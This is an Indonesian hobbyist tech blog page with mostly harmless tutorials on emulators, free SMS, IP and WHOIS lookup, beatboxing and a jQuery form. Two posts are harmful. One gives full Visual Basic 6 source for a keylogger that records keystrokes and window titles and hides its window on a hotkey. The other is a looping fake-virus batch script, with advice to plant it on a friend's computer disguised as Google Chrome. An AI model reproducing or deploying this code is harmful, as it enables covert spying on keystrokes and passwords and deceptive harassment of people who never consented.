#Nambah Ilmu , Berbagi Bersama , Penuh Warna , Cheat all Games

Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

Thursday, May 23, 2013

Cara Main Game PSP di Android


 
Soree sobat Joe semua lama tak jumpa nie , kali ini baru ada waktu untuk update pos di blog ini :) .
Pos kali ini tentang gimana sih cara main Game PSP di hp android kamu , nah langsung aja simak tutorial di bawah ini dan siapkan Gadget sobat tinggal download deh bahan - bahannya . SEMOGA BERMANFAAT.
  1. Yang pasti punya hp androidnya lah minimalh High end biar gak ngelag tapi ada juga yang standar bisa maenin tergantung dari games juga sih
  2. kalo udh download bahan atau emulatornya di sini http://buildbot.orphis.net/ppsspp/ cari versi terbaru dan pilih yang buat android 
  3. kalo udh instal dan buka
  4. Cara settingnya untuk versi 7.111 ke atas bisa lihat di http://www.youtube.com/watch?v=4nLmh20CzGM vidoenya cuman 44 detik gak makan kuota banyak kok
  5. kalo udh sekarang exit cari gamesnya duludi http://www.emuparadise.me/ kalo udh punya semuanyasekarang tinggal cara mainya
  6. Udh di setting kan tinggal load pilih games yang tadi kamu download (jgn lupa naruhnya)
  7. tunggu sbentar tara!!!!!!!!!!!! games sudah bisa di mainkan
  8. klo agak lag atau lambat coba teken tombol back  pada hp terus checklist show vps nanti ada ngka di pojok kanan atas
Nie ScreenShoot nya :


ScreenShoot By : Ahmad Ramdhani
Nah , gimana sob manteb kan main PSP di Android sobat .




Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT !!

Thursday, May 9, 2013

Cara Kirim SMS Gratis Lewat Internet


SMS gratis via internet bisa berguna saat Anda sedang internetan, kemudian mau SMS-an, eh HP miskin pulsa atau HP mati. Kalau Anda ingin tetap berkirim SMS, ada 2 solusi, pinjem HP teman, atau kirim SMS via internet. Kalau pinjam HP ke teman nggak usah saya kasih tutorialnya ya, yang cara kirim SMS gratis melalui internet saja yang saya kasih tutorial.

Caranya adalah melalui situs penyedia SMS gratis yang jumlahnya lebih dari satu. Salah satunya adalah Gmail. Gmail memang penyedia email, tetapi ada juga fitur yang bisa digunakan untuk mengirim SMS.

Situ Online Gratis SMS :
http://www.sms-online.web.id/
http://indosmsfree.com/

NB : Gunakan dengan bijak , jangan membuat hal ini menjadi negatif seperti meneror teman anda dsb.

Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT !!

Friday, April 5, 2013

Panduan Ubuntu 12.10 Dan Ubuntu Pocket Guide



Nah Joe tadi kan saya sudah Share tentang Ubuntu 12.10 dan sekarang saya akan memberikan Ebook panduan Ubuntu untuk sobat yang masih Familiar atau masih pemula di dunia ubuntu ini. Syukur-Syukur unutk menambah Referensi Sobat di dunia Ubuntu.
Langsung saja deh Check This Out...

Nah dan ini Ebook Ubuntu Pocket Guide dan Referensi nya :
 
 
 
Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT !!

Cara Mengendalikan PC dengan Android

Dalam post Blog Joe kali ini saya akan memberikan Aplikasi Unified Remote. Apa itu Unified Remote? Unified Remote adalah aplikasi gratis plus software yang bisa digunakan untuk mengendalikan komputer Windows langsung dari smartphone Android. Dengan aplikasi ini sobat bisa bekerja sambil bersantai di kamar atau sofa ditemani oleh Android kesayangan sobat. Untuk dapat menggunakan Unified Remote, terlebih dahulu sobat harus menginstall aplikasi ke dalam smartphone Android dan juga software di komputer Windows kamu agar kedua perangkat tersebut dapat bekerja dengan semestinya. Namun yang lebih penting, sobat juga harus memastikan bahwa kedua perangkat telah terhubung dalam satu jaringan Wi-Fi.

Meskipun awalnya Unified Remoter tersedia secara berbayar, namun sobat juga masih bisa menggunakan aplikasi ini secara gratis (Free Version) dengan fitur yang tidak kalah menariknya juga. Setelah kedua perangkat Android dan komputer Windows telah terhubung dalam jaringan Wi-Fi, barulah sobat bisa memulai menggunakannya.
Disini sobat dapat mengendalikan beberapa perintah komputer seperti menggantikan fungsi mouse dan keyboard (english, function, german, russian dan swedish), keyboard navigasi, keyboard numpad, mengakses file manager, menjalankan media, power control (restart, log off, sleep, lock, wake on lan, hibernate dan shutdown), scroll wheel (menggantikan scrool pada mouse), slide show untuk menjalankan presentasi, mengakses start menu, menjalankan media player (vlc, windows media center, Windows media palyer) dan yang terakhir mengakses situs Youtube. Enaknya lagi, Unified Remote bisa digunakan untuk beberapa komputer sekaligus secara bergantian. hoho Keren kan sob?

Langsung Download Disini :
For Android : Download Here
For Windows : Download Here
 
 
Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT !!

Saturday, March 30, 2013

Cara Melacak Lokasi Seseorang melalui IP Address

Perkembangan Internet yang begitu pesat menyebabkan maraknya kejahatan didunia mayapun sering sekali terjadi, salah satunya adalah penipuan dalam hal jual beli, pemalsuan akun, deface web, dan masih banyak lagi. Untuk menghindarinya, anda harus lebih berhati-hati dalam mengakses suatu situs, kunjungilah situs yang benar-benar terpercaya dan tingkatkanlah keamanan pada akun anda.. Tetapi jika anda sudah menjadi salah satu korban kejahatan tersebut, mungkin salah satu trik ini bisa anda lakukan.



Anda bisa melacak lokasi seseorang dari situs manapun .
Dengan memanfaatkan Geotool, kita bisa mendapatkan lokasinya.
ada banyak sekali website yang menggunakan fitur untuk melacak. salah satunya yaitu:
>>>>>>   GEOIPTOOL

>>>>>>   IPGEOTOOL
Kita cukup memasukkan ip address dari situs tersebut, ataupun nama situs tersebut.

Perhatikan gambar dibawah ini, 
Gambar ini merupakan hasil dari pencarian lokasi dari ip address yang sudah dimasukkan.






SUMBER




Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT!!

Tuesday, March 19, 2013

Cara Ngerjain Komputer Teman

Perkembangan komputer yang begitu pesat, menyebabkan beberapa orang yang tidak diinginkan membuat virus untuk menyerang komputer siapapun. Banyak sekali komputer yang sudah menjadi korban dari virus-virus tersebut. Untuk menghindari dari serangan virus tersebut, biasanya sipemilik komputer memasangkan berbagai antivirus pada komputernya, Tetapi pada artikel ini, saya yakin antivirus manapun tidak akan bisa menghapusnya, karena virus yang satu ini sangat mematikan.









Dari judulnya terlihat seram banget yah.
mungkin tidak seseram yang anda kira, karena itu hanyalah sebuah ungkapan saja.
dan seperti yang saya bilang antivirus manapun tidak akan bisa manghapus virus ini.
Bagi orang yang masih awam, mungkin akan mengira komputernya benar-benar terkena virus mematikan, tetapi sebenarnya ini bukanlah sebuah virus, melainkan suatu pesan yang akan terus muncul pada komputer korban, dan pesan ini tidak bisa diclose dan akan terus muncul dengan tulisan yang berbeda-beda.


Jika anda ingin membuatnya, sangatlah sederhana,
anda cukup menyediakan notepad saja.
lalu masukkan skript seperti dibawah ini:

@echo off
:begin
msg * KOMPUTER ANDA SUDAH TERINFEKSI VIRUS MEMATIKAN
msg * VIRUS INI SANGAT BERBAHAYA DAN TIDAK BISA DIHAPUS
msg * LEBIH BAIK ANDA HANCURKAN KOMPUTER ANDA SEKARANG
msg * ATAU!!! VIRUS INI AKAN MELEDAKKAN KOMPUTER DAN HATI ANDA!!!
msg * ALGORITMA-CYBER.BLOGSPOT.COM
GOTO BEGIN


Tulisan yang berwarna merah bisa anda ganti dengan kata apapun.
simpan dalam format .bat
lalu coba anda jalankan aplikasi tersebut.
maka akan keluar output seperti gambar dibawah ini:


Jika sikorban klik pada tombol OK atau tombol close, maka tulisan itu bukannya hilang, malah akan muncul tulisan baru. begitu seterusnya








pesan ini tidak akan bisa diclose,
bahkan melalui task managerpun tidak bisa.
untuk menghilangkan pesan tersebut
caranya anda harus menghapus file asli pesan ini.


Untuk menjalankan aksi anda agar terlihat lebih rapih.
sembunyikan file asli ini pada komputer teman anda, dengan cara dihidden.
lalu buat shortcutnya dan letakkan pada desktop teman anda.
usahakan membuat nama pesan mematikkan ini dengan nama aplikasi yang sering dibuka teman anda.


misalnya googlechorme, lalu ganti shortcutnya dengan google chorme.
sehingga benar2 seperti aplikasi google chrome
jika teman anda membuka google chorme buatan anda tersebut. maka akan muncul pesan yang membuat teman anda pusing 100 keliling.... hahaha..



Sumber :


Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT !!

Tuesday, March 12, 2013

Tutorial/Cara Dasar Dalam Beatbox [ Membuat ]




Cara mudah belajar beatbox :

 Sebelum kalian mau belajar Beatbox ada beberapa hal yang harus temen-temen hindarin, yaitu :
- Jangan malu membunyikan beat kalian di manapun.
- Jangan pernah behenti berlatih di saat kalian mulai kehabisan cara untuk belajar sound baru.
- Jangan pernah memanfaatkan Beatbox sebagai hal-hal negativ seperti menjadi sombong dan ajang cari jodoh.
- Jangan pernah merasa emosi saat kalian belajar dan teman-teman kalian ngeledekin/ngejelekin

------------------------------------------------------------
     Di beatbox itu cuma punya 3 suara dasar atau 3 beat dasar yaitu B T K,
B itu Kick Drum/Bass Drum
T itu Hi Hat
K itu Snare

------------------------------------------------------------------
1. Untuk suara kick Drum itu kata dasar/huruf vocal'nya adalah B, saat lo bilang huruf vocal B tersebut itu lo teken bibir lo rapet-rapet dan lo bilang BE atau BU pokoknya lo cari feel yang enak sampe kedengaran suara Bass dari B lo, lo coba ulang-ulang berkali-kali dan lo latih terus menerus, soalnya kalo masih awal suaranya itu masih belom jadi atau masih belom kedengeran bass'nya, jadi harus di coba terus,...

2. Trus Hi Hat, cara'nya tuh gampang banget lo cuma bilang huruf T tapi pas lo bunyi'innya tuh kayak mau ngomong bahasa inggris jadi'nya Tci-Tci-Tci,.... nah kalo lo bisa dengan lancar ngomong kata-kata itu berarti lo juga udah lancar buat bunyi'in Hi Hat tersebut, tinggal lo lancarin juga sampe bunyinya tuh enak banget buat di gabungin sama beat-beat lain

3. Snare, jujur sih sound ini emang agak susah buat di pelajarin tapi gua yakin lo semua pasti bakal bisa buat bunyi'in semua sound-sound di beatbox, nah caranya tuh kayak ngomong K terserah lo mau di tarik apa di keluarin dua-dua'nya bisa kok, tapi lo harus biasa'in di tarik soalnya Snare K yang bagus itu di tarik.
trus kalo cara di atas udah lumayan lancar atau bisa cara selanjutnya lo tarik K'nya kayak orang sakit gigi, tarik dari kedua sela-sela gigi bagian kanan dan kiri lo trus saat lo tarik itu lo kagetin tarikan'nya supaya suara hentakan dari Snare K lo bagus dan enak buat di denger, pokoknya lo harus rutin-rutin coba dan pelajarin, lo jangan ngeluh saat lo belajar entah susah'lah atau ribet'lah lo nikmatin aja proses belajar dan latihannya, semua beatboxer-beatboxer jago awal mereka belajar juga ngalamin hal itu, tapi karna mereka punya tekad yang kuat buat belajar beatbox dan mereka usaha'in terus sampe bisa nguasa'in sound-sound di beatbox....

4. Nah lo udah punya 3 sound-sound dasar di beatbox dan lo udah bisa bikin  pattern dari 3 beat dasar tersebut Contoh:
B T K T B T K T 2X dengan tempo yang santai atau slow

B TT B K TT BB TT B K TT BB, mulai dari tempo slow aja dulu kalo lo udah lumayan lancar tinggal lo naikin temponya sampe secepet yang lo bisa...

B T K T BB T K T B T K T BB T K, sama kayak yg di atas di mulai dari slow aja

nah kalo lo udah nguasa'in 3 beat dasar BTK tersebut dan lo udah lancar buat bunyi'in pattern-pattern yang gua kasih di atas lo bisa kembangin pattern lo sendiri dengan pemikiran lo sendiri dan kreatifitas lo sendiri, o ya di pattern-pattern yang gua kasih di atas kan ada yang dempet-dempet dan ada yang bercela-cela tuh kata-kata'nya, maksud'nya adalah buat kasih jarak atau jeda dari beat tersebut, jadi lo juga bisa sekalian belajar Tempo...

tunggu dulu...di beatbox gak cuma 3 suara itu doang lo, sound-sound di beatbox itu gak terbatas sob lo bisa bikin sound efek buatan lo sendiri
tapi gue saranin kalo lo udah lancar belajar beat dasar di atas buat selanjutnya lo belajar :
- Deeptrhoat atau suara robot
- Tecno Alarm
- Lip Oscillation

Untuk Video Tutorial nya nanti Gue buat di Postingan yang Berikut Ok :

Terimakasih Telah Membaca Artikel Saya ~~ SELAMAT SORE ☺

Cara Mengetahui Pemilik dan Informasi dari Suatu Website


Semenjak kemunculan internet, untuk mendapatkan suatu informasi itu sangatlah mudah, anda tinggal memanfaatkan search engine google, dengan mengetikkan kata kunci yang ingin dicari, maka ada banyak sekali informasi yang muncul sesuai kata kunci yang kita masukkan.
Tetapi kadang ada beberapa website yang memanfaatkan untuk penipuan. Jika anda kurang percaya pada  website tersebut, lebih baik anda abaikan saja, dan mencari informasi diwebsite yang lain. Tetapi jika anda penasaran pada website tersebut, anda bisa mencari tau mengenai website itu, dimulai dari pemilik website, email, alamat, bahkan tanggal pembuatannya dan masih banyak lagi.



Untuk mengetahuinya, anda bisa memanfaatkan whois yaitu protokol yang memungkinkan kita untuk melakukan akses database sebuah domain.
banyak sekali website yang menyediakan fasiltas untuk whois,

salah satunya

KLIK DISINI:
Kita cukup memasukkan url dari website tersebut.
dan klik whois, maka informasi pada website tersebut akan tampil.

untuk melihat hasilnya, anda bisa melihat gambar dibawah ini.
informasi yang saya dapatkan dari beberapa situs whois.






Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT !!

Wednesday, March 6, 2013

Membuat tombol Check Box All Pada Form


Check Box adalah suatu perintah yang digunakan untuk memberikan jawaban lebih dari satu. Misalnya ada suatu pertanyaan yang membolehkan kita untuk memilih lebih dari satu jawaban, bahkan boleh memilih semuanya. Mungkin bagi sipenjawab soal ini tidak masalah jika pilihannya hanya sedikit, tetapi jika pada soal itu terdapat banyak sekali jawaban, dan kita harus mencentang jawaban-jawaban itu satu persatu, tentunya hanya akan memakan waktu sipenjawab soal itu saja. untuk itu dalam jawaban pilihan itu, kita sibagai pembuatnya harus menyediakan tombol untuk menjawab semua pilihan dengan satu kali klik.




sebagai contoh, buatlah programnya seperti ini

<html>
<head>
 <title> Blog Tutorial - checkbox </title>
</head>
<body>
<div style="width: 300px;">
<form>
<h3>Materi yang paling anda sukai</h3>
<fieldset>
<input type="checkbox" name="cek1"> Pemrograman<br>
<input type="checkbox" name="cek2"> Hacking<br>
<input type="checkbox" name="cek3"> Internet<br>
<input type="checkbox" name="cek4"> Multimedia<br>
<input type="checkbox" name="cek5"> Networking<br>
<input type="checkbox" name="cek6"> Hardware<br>
<input type="checkbox" name="cek6"> Open Source<br><hr>
<input type="checkbox" id="pilihsemua"> Check All<br>
</fieldset><br>
<input type="submit">
</form>
</div>
</body>
</html>


Jika anda jalankan program tersebut, 
akan menghasilkan output seperti ini:


jika anda melakukan tanda centang pada tulisan check all, tentunya hanya tulisan tersebut saja yang akan tercentang, untuk membuat tulisan yang lain tercentang.
tambahkan skript berikut:  letakaan pada kode <head> LETAKKAN DISINI   </head>

<script type="text/javascript" src="../jquery/jquery.js"></script>
 <script type="text/javascript">
 $(document).ready(function() {
  $('#pilihsemua').click(function () {
   $(this).parents('fieldset:eq(0)').find(':checkbox').attr('checked', this.checked);
  });
 });
 </script>


sebelumnya anda harus memiliki satu library jquery, yaitu   jquery.js  

jika anda jalankan programnya lagi, dan melakukan centang maka akan menghasilkan output sperti dibawah ini:
cukup dengan satu kali klik, maka semuanya akan terpilih

Terimakasih Telah Membaca Artikel Saya ,dan Selamat Malam ^^ .

Sunday, February 17, 2013

Membuat Keylogger Dengan Visual Basic 6



  1. Siapkan Visual Basic , Disini saya menggunakan Visual Basic 6.0
  2. Buka program Visual Basic
  3. New Project Standard EXE

  4. Tambahkan 1 buah TextBox, 4 buah CommandButton, 2 Timer, dan 6 buah Label .


5.  Masukan Perintah dibawah ini.

  • Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
  • Private Declare Function GetForegroundWindow Lib “user32″ () As Long
  • Private Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hWnd As Long, ByVal sWndTitle As String, ByVal cLen As Long) As Long
  • Private hForegroundWnd As Long
  • Private backs As BooleanPrivate Sub Command1_Click()
  • Timer1.Enabled = True
  • End SubPrivate Sub Command2_Click()
  • Timer1.Enabled = False
  • End SubPrivate Sub Command3_Click()
  • backs = True
  • End SubPrivate Sub Command4_Click()
  • backs = False
  • End SubPrivate Sub Form_Load()
  • backs = True
  • End Sub
  • Private Sub Label1_Click()
  • End Sub
  • Private Sub Label4_Click()
  • End Sub
  • Private Sub Label6_Click()
  • Timer1.Enabled = True
  • End Sub
  • Private Sub Label7_Click()
  • Timer1.Enabled = False
  • End Sub
  • Private Sub Label8_Click()
  • backs = True
  • End Sub
  • Private Sub Label9_Click()
  • backs = False
  • End Sub
  • Private Sub Text1_Change()
  • Text1.SelStart = 0
  • Text1.SelLength = Len(Text1.Text)
  • End Sub
  • Private Sub Timer1_Timer()
  • Dim x, x2, i, t As Integer
  • Dim win As Long
  • Dim Title As String * 1000
  • win = GetForegroundWindow()
  • If (win = hForegroundWnd) Then
  • GoTo Keylogger
  • Else
  • hForegroundWnd = GetForegroundWindow()
  • Title = “”
  • GetWindowText hForegroundWnd, Title, 1000
  • Select Case Asc(Title)
  • Case 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95
  • Text1.Text = Text1.Text & vbCrLf & vbCrLf & “[ " & Title
  • Text1.Text = Text1.Text & " ]” & vbCrLf
  • End Select
  • End If
  • Exit Sub
  • Keylogger:
  • For i = 65 To 90
  • x = GetAsyncKeyState(i)
  • x2 = GetAsyncKeyState(16)
  • If x = -32767 Then
  • If x2 = -32768 Then
  • Text1.Text = Text1.Text & Chr(i)
  • Else: Text1.Text = Text1.Text & Chr(i + 32)
  • End If
  • End If
  • Next
  • For i = 8 To 222
  • If i = 65 Then i = 91
  • x = GetAsyncKeyState(i)
  • x2 = GetAsyncKeyState(16)
  • If x = -32767 Then
  • Select Case i
  • Case 48
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “)”, “0″)
  • Case 49
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “!”, “1″)
  • Case 50
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “@”, “2″)
  • Case 51
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “#”, “3″)
  • Case 52
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “$”, “4″)
  • Case 53
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “%”, “5″)
  • Case 54
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “^”, “6″)
  • Case 55
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “&”, “7″)
  • Case 56
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “*”, “8″)
  • Case 57
  • Text1.Text = Text1.Text & IIf(x2 = -32768, “(“, “9″)
  • Case 112: Text1.Text = Text1.Text & ” F1 “
  • Case 113: Text1.Text = Text1.Text & ” F2 “
  • Case 114: Text1.Text = Text1.Text & ” F3 “
  • Case 115: Text1.Text = Text1.Text & ” F4 “
  • Case 116: Text1.Text = Text1.Text & ” F5 “
  • Case 117: Text1.Text = Text1.Text & ” F6 “
  • Case 118: Text1.Text = Text1.Text & ” F7 “
  • Case 119: Text1.Text = Text1.Text & ” F8 “
  • Case 120: Text1.Text = Text1.Text & ” F9 “
  • Case 121: Text1.Text = Text1.Text & ” F10 “
  • Case 122: Text1.Text = Text1.Text & ” F11 “
  • Case 123: Text1.Text = Text1.Text & ” F12 “
  • Case 220: Text1.Text = Text1.Text & IIf(x2 = -32768, “|”, “\”)
  • Case 188: Text1.Text = Text1.Text & IIf(x2 = -32768, “<”, “,”)
  • Case 189: Text1.Text = Text1.Text & IIf(x2 = -32768, “_”, “-”)
  • Case 190: Text1.Text = Text1.Text & IIf(x2 = -32768, “>”, “.”)
  • Case 191: Text1.Text = Text1.Text & IIf(x2 = -32768, “?”, “/”)
  • Case 187: Text1.Text = Text1.Text & IIf(x2 = -32768, “+”, “=”)
  • Case 186: Text1.Text = Text1.Text & IIf(x2 = -32768, “:”, “;”)
  • Case 222: Text1.Text = Text1.Text & IIf(x2 = -32768, Chr(34), “‘”)
  • Case 219: Text1.Text = Text1.Text & IIf(x2 = -32768, “{“, “[")
  • Case 221: Text1.Text = Text1.Text & IIf(x2 = -32768, "}", "]“)
  • Case 192: Text1.Text = Text1.Text & IIf(x2 = -32768, “~”, “`”)
  • Case 8: If backs = True Then If Len(Text1.Text) > 0 Then Text1.Text = Mid(Text1.Text, 1, Len(Text1.Text) – 1)
  • Case 9: Text1.Text = Text1.Text & ” [ Tab ] “
  • Case 13: Text1.Text = Text1.Text & vbCrLf
  • Case 17: Text1.Text = Text1.Text & ” [ Ctrl ]“
  • Case 18: Text1.Text = Text1.Text & ” [ Alt ] “
  • Case 19: Text1.Text = Text1.Text & ” [ Pause ] “
  • Case 20: Text1.Text = Text1.Text & ” [ Capslock ] “
  • Case 27: Text1.Text = Text1.Text & ” [ Esc ] “
  • Case 32: Text1.Text = Text1.Text & ” “
  • Case 33: Text1.Text = Text1.Text & ” [ PageUp ] “
  • Case 34: Text1.Text = Text1.Text & ” [ PageDown ] “
  • Case 35: Text1.Text = Text1.Text & ” [ End ] “
  • Case 36: Text1.Text = Text1.Text & ” [ Home ] “
  • Case 37: Text1.Text = Text1.Text & ” [ Left ] “
  • Case 38: Text1.Text = Text1.Text & ” [ Up ] “
  • Case 39: Text1.Text = Text1.Text & ” [ Right ] “
  • Case 40: Text1.Text = Text1.Text & ” [ Down ] “
  • Case 41: Text1.Text = Text1.Text & ” [ Select ] “
  • Case 44: Text1.Text = Text1.Text & ” [ PrintScreen ] “
  • Case 45: Text1.Text = Text1.Text & ” [ Insert ] “
  • Case 46: Text1.Text = Text1.Text & ” [ Del ] “
  • Case 47: Text1.Text = Text1.Text & ” [ Help ] “
  • Case 91, 92: Text1.Text = Text1.Text & ” [ Windows ] “
  • End Select
  • End If
  • Next
  • End Sub
  • Private Sub Timer2_Timer()
  • Dim a, b, x As Long
  • a = GetAsyncKeyState(120)
  • b = GetAsyncKeyState(121)
  • x = GetAsyncKeyState(16)
  • If a = -32767 And x = -32768 Then Me.Hide
  • If b = -32767 And x = -32768 Then Me.Show
  • End Sub



6.  Jalankan dengan menekan tombol F5


Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT !!

Cara Internetan Gratis Melalui WI-FI

JavaCyber Was Here!!

 > buka web ini : http://login.biznethotspot.com/register.asp kemudian register,

>  setelah itu kamu akan mendapat sms yg bersi username dan password seperti ini:
Thanks for register lifetime account Biznet Hotspot service, your Username : 628########, Password = 8######, Enjoy!
jangan lupa simpan username dan pasword ke tempat yg aman dan jangan kasih tau ke orang lain.

kemudian cari alamat hotspot wifi di sini http://www.biznetnetworks.com/En/?menu=HotSpot 


Terimakasih Telah Membac Artikel Saya ~~ SEMOGA BERMANFAAT !!

Wednesday, February 13, 2013

Instal OS Android di Windows PC


Merasa tidak mungkin untuk menjalankan sistem operasi Android di komputer Windows? Coba saja install aplikasi WindowsAndroid, maka pengalaman menggunakan Android Ice Cream Sandwich (ICS) dapat Anda nikmati sepenuhnya melalui komputer.
Meskipun sebelumnya sudah ada perangkat lunak dari BlueStacks yang memiliki kemampuan serupa, namun aplikasi WindowsAndroid akan memberikan pengalaman Android sepenuhnya. Seperti menggunakan user interface, browser, gallery, dan aplikasi pihak ketiga platform 'robot hijau' tanpa perlu menginstall software dan hardware tambahan.
Aplikasi ini kompatibel dengan kernel Windows Vista, Windows 7, dan Windows 8 dengan beragam ukuran resolusi layar. Misalnya saat menginstall aplikasi pada layar berukuran 1280 x 800 piksel, secara otomatis tampilan aplikasi akan menyerupai tampilan pada layar ponsel.

Dilansir dari Androidepolice, Senin (28/1/2013), meskipun sudah mengusung penggunaan Android 4.0 aplikasi ini juga masih bisa digunakan dengan komputer yang dilengkapi keyboard dan mouse. Jadi bagi pengguna komputer Windows 7 dan Vista tetap bisa menikmati sensasi Android tanpa menggunakan layar sentuh.
Aplikasi hasil pengembangan Socketeq berkapasitas 66MB ini bisa diunduh melalui link ini dan jangan lupa melengkapi dengan sejumlah aplikasi khas Google. Sensasi fusion dua sistem operasi dalam satu perangkat? Mengapa tidak!
Download Here


Terimakasih Telah Membaca Artikel Saya ~~ SEMOGA BERMANFAAT !!

Translate

Visitors

Pengikut

--------------------------

Joe Martine Sihombing. Powered by Blogger.